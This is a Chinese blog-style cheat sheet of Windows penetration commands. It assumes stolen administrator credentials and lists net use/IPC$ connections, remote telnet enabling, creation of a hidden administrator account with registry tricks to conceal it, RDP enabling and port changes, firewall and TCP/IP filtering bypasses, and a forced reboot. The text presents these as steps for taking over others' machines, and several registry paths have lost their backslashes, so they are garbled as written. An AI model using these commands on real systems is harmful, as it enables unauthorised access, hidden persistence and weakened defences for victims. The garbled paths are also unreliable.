渗透常用命令

IPC$入侵常用命令

当然假设管理员账户名密码已经得到了
net use \ipipc$ "密码" /user:"用户名"  ——密码和用户名如果没有空格也可以不加引号,另外ipc$也可以不写,如下所示:
net use \ip 密码 /user:用户名
sc \ip config tlntsvr start= auto  ——注意start=后面有个空格
sc \ip start tlntsvr
telnet ip
input username passwd,thus get remote pc's shell
当然也可以用net time \ip 配合at指令定时开启telnet或是别的服务

可以添加用户名密码并加为管理员
net user chy$ chy /add
net localgroup administrators chy$ /add  ——用户名最后加$是可以防止对方在cmd窗口下输入net user显示自己添加的用户名,当然在计算机管理下的用户还是可以显示出来的,更深层次的创建隐藏的具有管理员权限的用户需要直接对注册表操作,大致思路就是新建一个账号,然后复制管理员的注册表信息到新建账号,注册表导出,删除新建账号,再导入,这样不仅net user看不到,计算机管理也看不到,一定要在注册表中才会看到,具体操作不再细说~

关于3389终端常用命令,整理如下(摘自网上):
【注:以下命令全部为CMD命令,可在 Telnet环境下执行】
1.查询终端端口 (适用于XP专业版、2000服务器版与2003操作系统):
REG query HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber
或以下命令:
regedit /e tsp.reg "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal serverWds dpwdTds cp"
type tsp.reg
2.开启XP&2003终端服务
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
3.更改终端端口为20008 (0x4E28)
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWds dpwdTds cp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4.取消xp&2003系统防 火墙对终端服务3389端口的限制及IP连接的限制
REG ADD HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileGloballyOpenPortsList /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5.开启Win2000的终端,端口为3389(需重启)
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion etcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS.DEFAULTKeyboard LayoutToggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
6.强行重启 Win2000&Win2003系统(执行完最后一条一句后自动重启)
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp% estart.inf
7.禁用TCP/IP端口筛选 (需重启)
REG ADD HKLMSYSTEMControlSet001ServicesTcpipparameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8.终端超出最大连接数时可用下面的命 令来连接
mstsc /v:ip:3389 /console

原文地址:https://www.cnblogs.com/cn-36/p/6724499.html